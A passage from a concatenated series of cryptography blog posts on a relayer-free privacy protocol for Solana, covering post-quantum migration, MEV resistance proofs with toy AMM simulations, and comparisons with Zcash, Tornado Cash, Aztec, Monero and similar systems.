100 | ~120 KB | 5K/proof | Doesn't help individual transactions (still 100 KB per submission) but amortises validator-side cost dramatically. ### Path 3: Off-chain STARK with on-chain commitment The most pragmatic near-term path. Publish the full STARK proof to a data-availability layer (Solana ledger via call-data, or a separate DA chain). On-chain verify only a 32-byte hash commitment. Add a challenge period where any observer can verify the off-chain proof and dispute on-chain if it's invalid. 
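Path 3's commit-and-challenge flow is simple enough to sketch end-to-end. A minimal Python model, with `verify_stark` stubbed out and all names hypothetical — the real design commits the 32-byte hash on-chain and lets any watcher who fetches the off-chain proof dispute within the challenge period:

```python
import hashlib

def commit(proof: bytes) -> bytes:
    """On-chain we store only this 32-byte commitment, not the ~100 KB proof."""
    return hashlib.sha256(proof).digest()

class DisputeWindow:
    """Toy challenge period: a dispute succeeds if the revealed bytes match
    the on-chain commitment but fail off-chain STARK verification."""
    def __init__(self, commitment: bytes, verify_stark):
        self.commitment = commitment
        self.verify_stark = verify_stark  # off-chain STARK verifier (stub)
        self.disputed = False

    def challenge(self, revealed_proof: bytes) -> bool:
        if hashlib.sha256(revealed_proof).digest() != self.commitment:
            return False  # wrong preimage — not the committed proof
        if not self.verify_stark(revealed_proof):
            self.disputed = True
        return self.disputed

# Usage: an invalid proof slips on-chain as a hash; a watcher disputes it.
bogus_proof = b"\x00" * 1024  # stand-in for a malformed STARK proof
window = DisputeWindow(commit(bogus_proof), verify_stark=lambda p: False)
assert window.challenge(bogus_proof)  # dispute succeeds within the window
```

The honest-verifier-for-retrieval assumption from the table is visible here: if nobody fetches and checks the proof before the window closes, the bogus commitment stands.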
| Configuration | Proof size | Verify CU | PQ | Fits tx? | |---------------|-----------|-----------|----|---------| | Groth16 (current) | 128 B | ~100K | No | Yes | | Raw STARK | ~100 KB | ~500K | Yes | No | | STARK + aggregation (n=10) | ~110 KB total | ~50K/proof | Yes | No (on-chain) | | STARK → Lattice-SNARK wrap | ~5-20 KB est | ~300K est | Yes | Marginal (SIMD-0296) | | Off-chain STARK + on-chain hash | 32 B hash | ~10K | Yes^* | Yes | `^*` Requires off-chain proof availability + honest-verifier assumption for retrieval. ## Isogeny-based group actions for credentials For applications needing **anonymous identity binding** — compliance-compatible privacy, selective disclosure, "prove balance ≥ threshold without revealing balance" — isogeny-based cryptography offers post-quantum group actions that can replace DLOG-based constructions. ### CSIDH-based ring signatures CSIDH defines a commutative group action `★: Cl(O) × E(F_p) → E(F_p)` between the ideal class group of an imaginary quadratic order and the set of supersingular elliptic curves over `F_p`. This group action instantiates Sigma protocols for "knowledge of an isogeny", which yields ring signatures via Fiat-Shamir. **Current status (cautious):** CSIDH at NIST-1 security needs `p ≈ 2^512`, key sizes ~64 B, computation ~50-100 ms. **Quantum security analysis (Bonnetain-Schrottenloher, Peikert) shows Kuperberg's quantum sub-exponential algorithm threatens CSIDH more aggressively than classical attacks** — proposed 128-bit classical / 64-bit quantum parameters can be broken in `~2^35` quantum key-exchange evaluations, not `~2^62`. So CSIDH at the 128-bit level is **not** secure at the originally advertised parameters. Larger parameters (`p ≈ 2^4096+`) restore the security but balloon costs. ### SQIsign **SQIsign** (De Feo, Kohel, Leroux, Petit, Wesolowski — NIST Round 2) offers compact post-quantum signatures (**204 bytes**) from quaternion isogeny problems. Signing time ~100 ms. 
Verification is computationally expensive (~100 ms), which makes it impractical for direct on-chain verification on Solana — a single SQIsign verification would consume the entire 1.4M CU budget. ### Open problem 7.3 — isogeny anonymous credentials Design an anonymous credential scheme based on supersingular isogeny group actions that: 1. Supports selective attribute disclosure. 2. Has verification time < 10 ms (compatible with blockchain block times). 3. Achieves 128-bit post-quantum security with concrete parameter justification. 4. Is compatible with the SPST note model (credentials bound to note commitments). This is wide open. The most promising shape is a **hybrid architecture**: isogeny-based credentials for identity binding, composed with STARK proofs for the transactional privacy layer. ## What survives without modification Two pieces of F_RP carry over unchanged into the post-quantum world: 1. **Poseidon Merkle trees.** Hash-based, no algebraic structure assumption beyond collision resistance. 2. **Indexed Merkle Trees** for nullifier non-membership. Same hashes, same structure, same constraints. So the *state* layer of F_RP doesn't need to change. Only the *proof* and *signature* layers. ## Migration timeline (rough) | Year | Milestone | |------|-----------| | 2026-2028 | F_RP v1: Groth16 + BN254 + Ed25519. Production deployment. | | 2028-2030 | NIST PQC standardisation completes. ML-DSA / SLH-DSA / Falcon shipped. | | 2030-2032 | Solana adds PQ syscalls (NIST-recommended). F_RP v2 design starts. | | 2032-2035 | F_RP v2 ships: hybrid pre-quantum + post-quantum proofs. Both verify. | | 2035-2040 | F_RP v3: pure post-quantum. Pre-quantum support deprecated. | This timeline is contingent on (a) NIST shipping PQC standards on schedule, (b) Solana adopting the syscalls within ~2 years of standardisation, and (c) lattice-based polynomial commitments achieving sub-10 KB proof sizes. None of these are certain. All three look likely. 
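The "both verify" rule in the v2 row of the timeline is worth pinning down, since it's what makes the hybrid window safe in both directions. A toy sketch — the verifier stubs and names are hypothetical, not any real F_RP API:

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class HybridProof:
    groth16: bytes  # 128 B pre-quantum proof
    pq: bytes       # ~5-20 KB lattice-wrapped STARK

def verify_v2(proof: HybridProof,
              verify_groth16: Callable[[bytes], bool],
              verify_pq: Callable[[bytes], bool]) -> bool:
    """Hybrid window: a quantum forger of the Groth16 proof still fails the
    PQ check, and an unsound early PQ prover is still backstopped by Groth16."""
    return verify_groth16(proof.groth16) and verify_pq(proof.pq)

proof = HybridProof(b"g16-bytes", b"pq-bytes")
assert verify_v2(proof, lambda _: True, lambda _: True)
assert not verify_v2(proof, lambda _: False, lambda _: True)  # Shor-era forgery
assert not verify_v2(proof, lambda _: True, lambda _: False)  # PQ prover bug
```

The conjunction is the whole design: soundness of the hybrid is the soundness of the *stronger* system against each adversary class, at the price of carrying both proofs.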
## What would have to change in F_RP itself The protocol design is mostly insulated. Specifically: 1. **The note model is unchanged.** Notes, commitments, nullifiers, Merkle trees — all hash-based. 2. **The five-tuple `(Setup, Deploy, Invoke, Verify, Finalize)` is unchanged.** Just the proof system inside `Invoke`/`Verify` swaps out. 3. **The simulation-based privacy theorem (3.12) survives.** The hybrid argument's transitions are: ZK of proof system, pseudorandomness of hash, pseudorandomness of PRF, CCA2 of encryption. The ZK / PRF / CCA2 each get a post-quantum-secure replacement; the structure of the proof is the same. 4. **The self-sovereignty theorem (3.13) survives unchanged.** It only depends on chain liveness and proof system completeness. What changes: byte sizes, CU costs, prover times. The math survives. That's a lucky property of having designed F_RP around the abstract `Π_hybrid` rather than committing to Groth16 in the relations. ## Why this isn't urgent (today) It's worth ending the series with the honest answer to "should I be worried right now?": No. Not in 2026, not in 2028. A cryptographically-relevant quantum computer is plausibly a decade-plus away. The harvest-now-decrypt-later threat applies to confidentiality (encrypted communications today, decrypted later when QC arrives) — but most F_RP outputs are *commitments and nullifiers*, not encrypted plaintexts. The information-theoretic content of an old shielded transaction is bounded; an adversary who breaks it in 2040 learns transaction graph structure that's no longer interesting. What does need attention: **building the migration path now** so that when the day comes, F_RP isn't a 2-year rewrite project. That's what this post is for. ## Closing the series Eleven posts: 1. [Series intro](/blog/relayerless_privacy_intro/) — the F_RP framework and the five games. 2. [The fee paradox](/blog/the_fee_paradox/) — why every smart-contract privacy protocol needs a relayer. 3. 
[SPST](/blog/spst_self_paying_shielded_transactions/) — self-paying shielded transactions, four security theorems. 4. [PPST](/blog/ppst_private_programmable_state/) — private programmable state via R1CS embedding. 5. [TAB](/blog/tab_threshold_anonymous_broadcast/) — submitter anonymity via ring sigs and FROST. 6. [Verifiable shuffles](/blog/verifiable_shuffles_for_privacy/) — Bayer-Groth network-layer mixing. 7. [UPEE](/blog/upee_universal_private_execution/) — composing the framework, the simulation-based privacy and self-sovereignty theorems. 8. [Solana instantiation](/blog/solana_instantiation_656_bytes/) — concrete numbers: 656 bytes, 235K CU. 9. [F_RP vs the rest](/blog/f_rp_vs_existing_privacy_systems/) — comparison with nine deployed privacy systems. 10. [MEV resistance](/blog/mev_resistance_in_private_execution/) — sandwich-proof by construction; Theorem 7.4. 11. [Post-quantum migration](/blog/post_quantum_relayerless_path/) — the future-proofing plan you just read. The full preprint will land at `/papers/relayerless-privacy/` once typeset. Until then the series is the canonical reference. If you want to discuss any of it, [book a call](https://cal.com/daxts) or open an issue on `Dax911/zera-sdk`. Thanks for reading. ## Bibliography - Shor, P. W. (1997). *Polynomial-Time Algorithms for Prime Factorization and Discrete Logarithms on a Quantum Computer.* SIAM Journal on Computing. - Golovnev, A., Lee, J., Setty, S., Thaler, J., Wahby, R. (2023). *Brakedown.* CRYPTO 2023. - Xie, T., Zhang, Y., Song, D. (2022). *Orion.* CRYPTO 2022. - Ben-Sasson, E. et al. (2018). *STARKs.* https://eprint.iacr.org/2018/046 - De Feo, L., Kohel, D., Leroux, A., Petit, C., Wesolowski, B. (2020). *SQIsign.* ASIACRYPT 2020. https://eprint.iacr.org/2020/1240 - Castryck, W. et al. (2018). *CSIDH.* ASIACRYPT 2018. https://eprint.iacr.org/2018/383 - Bonnetain, X., Schrottenloher, A. (2018). *Quantum Security Analysis of CSIDH.* - Peikert, C. (2020). 
*He gives C-sieves on the CSIDH.* - NIST PQC Round 4 — *Post-Quantum Cryptography Standardization.* Previous: [MEV resistance ←](/blog/mev_resistance_in_private_execution/) · Series: [back to start](/blog/relayerless_privacy_intro/) --- # MEV resistance: why UPEE is sandwich-proof by construction Canonical: https://blog.skill-issue.dev/blog/mev_resistance_in_private_execution/ Description: Theorem 7.3 — UPEE transactions resist sandwich/frontrun/liquidation MEV by construction. Theorem 7.4 — block MEV bounded by public-bit leakage, not transaction value. Independent of V, not super-linear. Published: 2026-05-14T15:00:00.000Z Tags: zk, mev, flashbots, mempool, privacy, phd import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; MEV is the second-order tax on public DeFi. Searchers monitor the mempool, see your swap before it confirms, and front-run / back-run / sandwich it for profit. On Ethereum L1 in 2024-2025, MEV extracted from retail users approached **\$700M/year** — straight value transfer from end users to searchers and validators. UPEE eliminates the dominant classes of MEV by construction. This post derives why, and quantifies what's left. This is post 10 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. ## What MEV is, formally **Definition.** Let `B = (tx_1, ..., tx_n)` be a block of transactions, `σ_0` the pre-block state. The MEV of block `B` relative to validator `V` is: $$ \mathrm{MEV}(B, V) \;=\; \max_{\pi \in S_n,\ \mathsf{tx}_{\mathrm{ins}}} \Bigl[\,\mathrm{profit}_V(\sigma_0, \pi(B) \cup \mathsf{tx}_{\mathrm{ins}}) - \mathrm{profit}_V(\sigma_0, B)\,\Bigr]. $$ The maximum is over (a) all permutations `π` of the transaction ordering and (b) all sets `tx_ins` of transactions the validator may insert. `profit_V` is the validator's balance change after executing the reordered/augmented block. 
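The maximisation over `(π, tx_ins)` is concrete enough to brute-force on a toy example. The sketch below models a zero-fee constant-product AMM and a validator that inserts a front-run/back-run pair around a single visible victim swap — exercising the `tx_ins` half of the definition. All pool sizes are made up; the point is that this is exactly the computation a validator cannot run against a UPEE transaction, because it never sees the victim's direction or size:

```python
# Toy constant-product AMM: x * y = k, zero fees, made-up liquidity.
def swap_x_for_y(pool, dx):
    x, y = pool
    dy = y - (x * y) / (x + dx)
    return (x + dx, y - dy), dy

def swap_y_for_x(pool, dy):
    x, y = pool
    dx = x - (x * y) / (y + dy)
    return (x - dx, y + dy), dx

POOL0 = (10_000.0, 10_000.0)  # illustrative reserves
VICTIM = 100.0                # victim visibly sells 100 X

def sandwich_profit(front_size):
    """Validator strategy: insert a sell before the victim and a buy after —
    the inserted-transaction term of the MEV definition, profit in X."""
    pool, y_got = swap_x_for_y(POOL0, front_size)  # front-run
    pool, _ = swap_x_for_y(pool, VICTIM)           # victim at worse price
    pool, x_back = swap_y_for_x(pool, y_got)       # back-run
    return x_back - front_size

best = max(sandwich_profit(f) for f in range(0, 2000, 10))
assert best > 0  # public mempool: strictly positive MEV from insertion alone
```

With zero fees the profit grows with the front-run size, approaching the victim's full input in the limit — the sandwich is pure value transfer from the victim to the inserter.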
Concretely, the four dominant MEV categories: | Category | What the adversary needs | Public DeFi cost | |----------|--------------------------|-----| | **Sandwich** | Trade direction + size | $(V^2 / L)$ for a $V$-sized swap, $L$ pool liquidity | | **Frontrunning** | Transaction content | Up to full tx value | | **Backrunning** | Observable state change | Bounded by arbitrage opportunity | | **Liquidation** | Position state | Liquidator's bonus % | ## Theorem 7.3 — MEV resistance of private transactions **Statement.** Let `tx` be a private UPEE transaction. For any PPT adversary `A` (including a colluding validator): $$ \Pr[\mathrm{MEV}_A(\mathsf{tx}) > 0] \;\leq\; \mathsf{negl}(\lambda) $$ for sandwich attacks, frontrunning, and liquidation MEV. **Backrunning** is bounded separately by public-output leakage. ### Proof of sandwich resistance A sandwich attack requires the adversary to determine the trade direction (buy or sell) and approximate size of the victim's swap. In UPEE, the transaction content — including the program being invoked, the private inputs, and the state transition — is hidden by the ZK proof. By Theorem 3.12 (simulation-based privacy), there exists a simulator `S` that produces a computationally indistinguishable view using only the public outputs `({nf_i}, {cm_j}, f, program_id)`. `S` does not receive the trade direction or size: $$ \bigl|\,\Pr[\mathcal{A}(\mathsf{View}_{\mathrm{Real}}) = \mathrm{direction}] - \tfrac{1}{2}\,\bigr| \;\leq\; \mathsf{negl}(\lambda). $$ Without the direction, a sandwich attack is a coin flip — expected profit zero (the adversary is equally likely to lose as to gain). ### Proof of frontrunning resistance Frontrunning requires the adversary to know what the transaction will do *before* it confirms. In UPEE the transaction content is encrypted within the ZK proof; the adversary sees only the public tuple, which is simulatable without the witness. 
The adversary has no advantage in predicting the transaction's effect on state, so frontrunning degenerates to random speculation. ∎ ### Proof of liquidation resistance Liquidation MEV requires knowing that a specific position has become undercollateralised. In UPEE, position state lives in the private state tree as committed values. The adversary can see *that* a position exists (via its commitment) but not whether it is liquidatable — that requires opening the commitment, which the ZK proof guarantees they cannot do. ∎ ### The backrunning caveat Backrunning exploits **observable state changes after the fact**. Even with UPEE, some public state changes leak: a private DEX swap might cause an observable change in a public AMM's price oracle, and that's a backrunnable event. The leakage is bounded by the number of bits of public state affected by the transaction. This is the point of Theorem 7.4. ## Theorem 7.4 — MEV revenue bound **Statement.** For a block containing `n` private UPEE transactions, the expected MEV revenue for a validator is bounded by: $$ \mathbb{E}[\mathrm{MEV}] \;\leq\; n \cdot f_{\max} \;+\; \ell_{\mathrm{bits}} \cdot v_{\mathrm{bit}} $$ where: - `f_max = max_i f_i` is the maximum public fee — validators trivially "extract" fees, but those are legitimate compensation for inclusion. - `ℓ_bits = sum |public outputs of tx_i|` is total information leakage in bits across the n transactions. - `v_bit` is the maximum economic value per bit of leaked information (application-dependent). **Proof.** Each private transaction contributes at most `f_i ≤ f_max` in direct revenue. Additional MEV requires exploiting information beyond the fee. By Theorem 7.3, the only exploitable info is from public outputs. Each bit of public output conveys at most one bit about private state. 
The economic value extractable per bit is bounded by the application's value density — for a DEX trade of value `V`, one bit of direction info yields expected profit `O(√V)` due to the square-root law of market impact. Sum over bits and transactions. ∎ ## The qualitative shift For public DeFi, MEV from a swap of value `V` scales as **`O(V^2 / L)`** for sandwich attacks (super-linear in `V`). For UPEE, MEV is bounded by **public-bit leakage × per-bit value**, which is **independent of `V`**. That's the shift. MEV no longer scales with transaction value. A user moving \$10M through UPEE is not 10× more valuable to an MEV searcher than a user moving \$1M — both leak the same number of public bits. | Model | Sandwich MEV scaling | Frontrun scaling | |-------|----------------------|------------------| | Public DeFi (Uniswap on ETH) | $O(V^2 / L)$ | $O(V)$ | | UPEE | $O(\ell_{\mathrm{bits}})$ — independent of V | 0 | ## Public outputs of a UPEE transaction Concretely, the public bits leaked per transaction: | Output | Bits | Information content | |--------|------|---------------------| | Nullifiers | 256 × n_in | Pseudorandom from the adversary's view (PRF security) | | Commitments | 256 × n_out | Pseudorandom from the adversary's view (Poseidon hiding) | | Merkle root | 256 | Public state, doesn't carry tx-specific info | | Fee | 64 | Reveals fee tier, ~10 bits effective entropy | | program_id | 256 | Identifies *which* program; partial function privacy leak | Pseudorandom outputs by definition leak nothing about the underlying state. The MEV-relevant leak is the **fee tier** (~10 bits) and the **program_id** (which program executed). For a DEX program, the program_id reveals that *some* swap happened in *that* DEX — but not the direction, size, or counterparty. ## What about backrunning a private DEX? A private swap might still cause an observable state change in the DEX's *public* price oracle. 
In that case the backrunner observes: - A nullifier was consumed (the swap happened). - The price oracle moved by some amount Δp. Δp encodes the trade size. The backrunner can arbitrage based on Δp without knowing who swapped or in which direction. **Mitigation.** Use a batch-auction DEX (Penumbra's ZSwap is the reference design): aggregate all swaps in a block into a single batch with a uniform clearing price. The price oracle moves once per block, not per trade. Individual trade direction and size remain hidden; only the *net* batch flow is visible. This is on the F_RP roadmap as a separate construction (Private Batch Auction, PBA). ## What stays public no matter what Three things UPEE can't hide while still letting validators do their job: 1. **The fee `f`.** Validators need to know `f` to prioritise inclusion. This is a 64-bit public input. 2. **The fact a transaction occurred.** The validator inserts the nullifier and commitment, both public. 3. **Block timing.** Block-level patterns (transactions per block, time-of-day) leak metadata about overall protocol usage. The first two are inherent to any chain with fees and global state. The third is mitigated by batch-auction DEX design and by encouraging client-side delay sampling on the user side. 
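The qualitative shift above — sandwich cost `O(V²/L)` versus a flat `ℓ_bits · v_bit` — is easiest to see numerically before comparing with other mitigations. A back-of-envelope sketch; the liquidity and per-bit value are illustrative placeholders, not measured figures:

```python
def public_sandwich_cost(v: float, liquidity: float) -> float:
    """Public DeFi: sandwich loss scales as V^2 / L — super-linear in V."""
    return v ** 2 / liquidity

def upee_mev_bound(leaked_bits: int, value_per_bit: float) -> float:
    """UPEE: bounded by ell_bits * v_bit (Theorem 7.4), independent of V."""
    return leaked_bits * value_per_bit

L_POOL = 100_000_000.0  # pool liquidity in USD — placeholder
LEAK_BITS = 10          # ~10 effective bits (fee tier), per the leakage table
V_BIT = 5.0             # USD per leaked bit — application-dependent guess

for v in (1_000.0, 1_000_000.0, 10_000_000.0):
    print(f"V=${v:>12,.0f}  public=${public_sandwich_cost(v, L_POOL):>12,.2f}"
          f"  upee=${upee_mev_bound(LEAK_BITS, V_BIT):.2f}")
# Public cost grows quadratically with V; the UPEE bound stays flat.
```

A 1,000× larger trade costs 1,000,000× more in public sandwich MEV but exactly the same under the UPEE bound — the "independent of V" claim in tabular form.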
## Comparison with Flashbots, MEV-Share, encrypted mempools The Ethereum ecosystem has been working on MEV mitigation for years: | Approach | Mechanism | What's hidden | What still leaks | |----------|-----------|---------------|------------------| | **Flashbots private mempool** | Direct submission to builder | Tx contents pre-confirmation | Builder sees + can extract MEV | | **MEV-Share** | Selective metadata disclosure | User chooses | What user discloses | | **Shutter Network** | Threshold-encrypted mempool | Tx until block sealed | Tx after seal | | **EIP-8105 enshrined encrypted mempool** | Protocol-level encryption | Tx during ordering | Some patterns | | **UPEE (this work)** | ZK-encrypted execution | All inputs/outputs | Fee + program_id + state-change side-effects | The Ethereum approaches are all about *delay* — hide the tx until the moment it's executed, accepting the leak after that. UPEE is structurally different: the tx is *never* visible in plaintext. Even after execution, the inputs and intermediate state remain encrypted. ## Why this matters for retail The user-facing implication: a retail user on UPEE doesn't pay an MEV tax that scales with their trade size. They pay their explicit fee `f` and a small bounded leakage cost. For a \$1M trade on UPEE, MEV cost is bounded by the same `ℓ_bits · v_bit` term as a \$1k trade. That's the point of building this on a smart-contract chain. Public DeFi is great for liquidity but hostile to retail. Private execution restores the property that "I trade because I want to trade", not "I trade and pay an invisible 30-50bps tax to the searchers between me and the AMM". ## Open problem 7.5 — tightness The bound in Theorem 7.4 is an upper bound. Is it tight? Specifically: construct an adversary that achieves MEV revenue within a constant factor of `ℓ_bits · v_bit`, or prove the bound can be tightened by structural analysis of SPST/UPEE. This is open. 
My intuition is the bound is loose — most public outputs are pseudorandom and don't carry economic value. But proving it requires careful analysis of the leakage channels, which are application-specific. ## Bibliography - Daian, P., Goldfeder, S., Kell, T. et al. (2019). *Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges.* IEEE S&P 2020. - Flashbots Collective. *MEV-Share: programmably private orderflow.* - Shutter Network. *EIP-8105: Universal Enshrined Encrypted Mempool.* - Penumbra Labs. *ZSwap: shielded sealed-bid batch auctions.* - ESMA (2025). *Maximal Extractable Value: Implications for Crypto Markets.* European Securities and Markets Authority. Previous: [F_RP vs the rest ←](/blog/f_rp_vs_existing_privacy_systems/) · Next: [The post-quantum migration path →](/blog/post_quantum_relayerless_path/) --- # F_RP vs Zcash, Tornado, RAILGUN, Aztec, Penumbra, Aleo, Namada, Monero Canonical: https://blog.skill-issue.dev/blog/f_rp_vs_existing_privacy_systems/ Description: F_RP vs nine deployed privacy systems on the four axes that matter: relayer-free, Turing-complete, on-chain verifiable on a high-perf L1, low-trust setup. Published: 2026-05-12T15:00:00.000Z Tags: zk, comparison, zcash, tornado, aztec, monero, phd import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; I've now spelled out the full F_RP framework. Two natural next questions: 1. Has someone built this already? 2. If not, what's the closest existing thing and why doesn't it cover the same ground? This post answers both. We compare F_RP against nine deployed privacy systems on twelve axes. The TL;DR: **no existing system simultaneously achieves relayer-free operation, Turing-complete computation privacy, and on-chain-verifiable proofs on a general-purpose Layer-1 blockchain.** That's the gap F_RP fills. This is post 9 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. 
## The matrix | Property | F_RP (ours) | Zcash Orchard | Tornado Cash | RAILGUN | Aztec | Penumbra | Aleo | Namada | Monero | |---|---|---|---|---|---|---|---|---|---| | **Relayer required** | **No** | No | **Yes** | **Yes** | No (sequencer) | No | No | No | No | | **Proof system** | Groth16 (BN254) + Nova | Halo 2 (IPA) | Groth16 (BN254) | Groth16 (BN254) | Honk (UltraPLONK) | Groth16 (BLS12-377) | Varuna (Marlin) | Groth16 (BLS12-381) | CLSAG + Bulletproofs+ | | **Proof size** | 128 B compressed | 2,720 + 2,272·n B | 128 B | 128 B/circuit | ~400-800 B | ~192 B | Compact (KZG) | ~192 B | O(ring_size) + log(n) | | **Verification cost** | ≈150K CU on Solana | ~10ms CPU | ~200K gas (ETH) | 600K-1M gas | Off-chain L2 batch | Native (L1) | Native (L1) | Native (L1) | O(ring_size) EC | | **Trusted setup** | Per-circuit MPC | **None** | Per-circuit MPC | Per-circuit MPC | Universal KZG | Per-circuit MPC | Universal KZG | Per-circuit MPC | **None** | | **Post-quantum** | No (STARK migration path) | No (DLOG) | No | No | No | No | No | No | No (DLOG) | | **Anonymity set** | Global shielded pool (2^32) | All Orchard notes | Per-denomination (2^20) | All shielded UTXOs | All encrypted notes | Multi-asset unified pool | All records | Multi-asset MASP | Ring 16 (FCMP++ pending) | | **Programmability** | **Full (PPST)** | None | None | Limited DeFi | **Full (Noir)** | Limited (DEX/staking) | **Full (Leo)** | Limited (Convert) | None | | **Fee mechanism** | **Self-paying from pool** | Self-paying via valueBalance | **Relayer pays gas** | **Broadcaster pays gas** | Client-side ZK fee proof | Public fee from balance | Private fee proof | Convert circuit | Public miner fee | | **Self-sovereignty** | **Full (Theorem 3.13)** | Full | **Partial (relayer)** | **Partial (Broadcaster)** | Full (PXE-side) | Full | Full | Full | Full | | **Target chain** | **Solana** (smart-contract layer) | Zcash L1 | Ethereum (EVM) | EVM L1s | Ethereum L2 rollup | Cosmos L1 | Aleo L1 | Namada L1 | Monero 
L1 (PoW) | | **Program privacy** | **Full** (program inputs/outputs hidden) | N/A | N/A | N/A | Partial (public calls visible) | N/A | Partial (program ID visible) | N/A | N/A | ## Three things F_RP gets that nobody else gets simultaneously ### 1. Relayer-free on a smart-contract chain Zcash, Penumbra, Monero, and Aleo are all relayer-free, but they're each their **own L1 chain**. Their consensus, validators, and fee mechanism are bespoke. They get relayer-freedom by being a chain, not by solving the smart-contract-layer problem. Aztec is relayer-free on a smart-contract platform — but it's an **L2 rollup with its own sequencer**. The sequencer is the de facto relayer with extra steps; if it goes offline, the L2 stalls. Aztec's deployment model isn't applicable to Solana. F_RP runs as a **smart-contract program on Solana mainnet**. Same validators that run Jupiter and Helium. No new chain, no new sequencer, no relayer. The only assumption is Solana's chain liveness — which is what every Solana program already assumes. ### 2. Turing-complete program privacy Tornado Cash and RAILGUN provide value transfer only. No conditional logic, no AMM, no auctions — just shielded ERC-20 transfers (or fixed-denomination ETH). Adding programmability would require redesigning the protocol from the ground up. Aztec and Aleo do offer programmability. Aztec ships Noir, Aleo ships Leo. Both work, both are L1-or-L2 specific. F_RP's PPST construction puts arbitrary arithmetic circuits inside the proof on a chain that wasn't built for them. The R1CS for the user's program is embedded as a sub-circuit of the outer PPST relation. The Solana on-chain verifier doesn't care what the program is — it just verifies the wrapping Groth16 proof. ### 3. On-chain verification on a high-throughput L1 Solana's `alt_bn128` syscalls verify Groth16 in ~150K CU (~$0.02 USD at typical priority fees). Block time ~600ms. Theoretical TPS in the tens of thousands. 
| Chain | Groth16 verification cost | Block time | |-------|---------------------------|-----------| | Ethereum L1 | ~200K gas (~$5-12 USD) | 12 s | | Solana L1 | ~150K CU (~$0.02 USD) | 0.6 s | | Zcash L1 | Native (no gas model) | 75 s | The cost difference is ~250× and the latency difference is ~20×. For a privacy protocol that wants to compose with public DeFi (private swap → public AMM → private settlement), Solana's economics are the only ones that work for retail users. ## Where F_RP loses to existing systems Honest comparison cuts both ways. Three places F_RP loses: ### To Zcash Orchard: trusted setup Zcash Orchard uses **Halo 2 with IPA** over Pasta curves — fully transparent, no per-circuit ceremony. F_RP's primary instantiation uses Groth16 with a per-circuit MPC ceremony. The migration path is the hybrid proof architecture (Theorem 3.8): inner STARK or Nova folding (transparent), outer Groth16 wrapper. Once SIMD-0302 ships on Solana (BN254 G2 syscall), we can switch the outer to PLONK with universal SRS — eliminating per-circuit ceremonies. Until then, Groth16 is the price of admission for cheap on-chain verification. ### To Monero: simplicity of the threat model Monero's privacy story fits in three sentences: ring signatures hide the sender, stealth addresses hide the receiver, RingCT hides the amount. No L2, no relayers, no shielded pool, no programmability. That simplicity is a *feature* — Monero has been deployed and battle-tested since 2014. F_RP is more complex because it does more. Programmability is genuinely harder than value transfer. The price of that complexity falls on the user; the gain is composability with the rest of the Solana ecosystem. ### To Aztec: native privacy DSL Aztec ships **Noir**, a Rust-like DSL purpose-built for ZK circuits. Compiles to ACIR, plugs into Honk / Barretenberg with first-class Aztec idioms (private functions, public functions, scheduled cross-boundary calls). 
F_RP currently relies on Circom or Noir for circuit authoring, with the developer responsible for wiring the program into the PPST relation. There's no "F_RP DSL" yet. That's a tooling gap, not a protocol gap — Noir-to-PPST adapters are an obvious next step. ## What F_RP and Zcash agree on A pleasant surprise: F_RP's SPST construction and Zcash's Sapling spend description are mathematically isomorphic. Same note/commitment/nullifier model, same value-balance equation, same Pedersen value commitments. The differences are deployment: - Zcash runs on its own L1 with native fee handling. - F_RP runs on Solana with the fee extracted from a program PDA reserve. The cryptography is the same. F_RP is, in some sense, "Zcash's Sapling pool, ported to Solana, extended with PPST for programs and TAB for submitter anonymity, with fees handled by an in-program reserve." The hard part is the protocol design. The cryptography is just engineering. ## What F_RP and Aleo agree on Aleo's records model (from ZEXE) and F_RP's PPST share the core insight: **a private program is an arithmetic circuit, and the proof attests to correct execution over committed state**. Both use a notion of records / notes that get nullified on consumption. The difference is again deployment: - Aleo runs on its own L1 with a native delegated-prover marketplace. - F_RP runs on Solana with prover delegation as a separate off-chain market. And one big disagreement: Aleo has elected **not** to implement function privacy — the program ID is visible on-chain. F_RP makes the same trade-off in v1 but flags universal-circuit-based function privacy as a future extension. ## The 2x2x2 decision lattice Here's the same data as a decision tree: <Mermaid chart={`flowchart TD
    Q1{Privacy with
smart contracts?} Q1 -->|No| Q2{Want
programmability?} Q1 -->|Yes| Q3{Need it
relayer-free?} Q2 -->|No| Z[Zcash / Monero] Q2 -->|Yes| A[Aleo / Penumbra] Q3 -->|No| T[Tornado / RAILGUN
relayer-dependent] Q3 -->|Yes| Q4{Layer 1 or 2?} Q4 -->|L2| AZ[Aztec] Q4 -->|L1| F[F_RP] classDef leaf stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff classDef us stroke:#facc15,stroke-width:3px,fill:#0a0a0a,color:#fff class Z,A,T,AZ leaf class F us `}/> The branch where F_RP lives — "yes I want a smart-contract chain, yes I want relayer-free, yes I want L1, with cheap on-chain verification" — is the cell that was empty until now. ## Bibliography - Hopwood, D., Bowe, S., Hornby, T., Wilcox, N. *Zcash Protocol Specification.* https://zips.z.cash/protocol/protocol.pdf - Pertsev, A., Semenov, R., Storm, R. *Tornado Cash Privacy Solution v1.4.* - RAILGUN Documentation. *Privacy System Architecture.* - Aztec Network. *Client-side Proof Generation.* https://aztec.network/blog/client-side-proof-generation - Penumbra Labs. *Penumbra Protocol Documentation.* https://protocol.penumbra.zone/main/index.html - Bowe, S., Chiesa, A., Green, M., Miers, I., Mishra, P., Wu, H. (2020). *ZEXE.* IEEE S&P 2020. - Namada Network. *Multi-Asset Shielded Pool.* https://github.com/namada-net/masp - Noether, S., Mackenzie, A. (2016). *Ring Confidential Transactions.* MRL-0005. Previous: [Solana instantiation ←](/blog/solana_instantiation_656_bytes/) · Next: [MEV resistance →](/blog/mev_resistance_in_private_execution/) --- # Fitting F_RP in 656 bytes on Solana Canonical: https://blog.skill-issue.dev/blog/solana_instantiation_656_bytes/ Description: Concrete F_RP instantiation on Solana. Groth16 over BN254, Poseidon Merkle, indexed nullifier tree, BN254 Pedersen, transaction in 656 of 1,232 bytes, 235K of 1.4M CU. Published: 2026-05-10T15:00:00.000Z Tags: zk, solana, bn254, alt_bn128, engineering, phd import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; The previous six posts derived F_RP at the level of relations and theorems. This post is the engineering side: every byte and every compute unit. 
